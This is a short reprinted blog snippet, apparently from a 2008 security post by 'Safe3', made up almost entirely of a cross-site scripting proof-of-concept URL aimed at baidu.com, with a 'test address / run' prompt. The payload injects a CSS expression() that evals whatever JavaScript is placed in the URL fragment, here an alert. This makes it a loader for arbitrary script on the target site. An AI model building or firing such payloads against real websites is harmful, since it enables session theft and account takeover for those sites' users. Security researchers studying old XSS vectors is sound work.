http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%27www.safe3.cn%27%29
测试地址:
运行
转载于:https://www.cnblogs.com/Safe3/archive/2008/07/10/1239966.html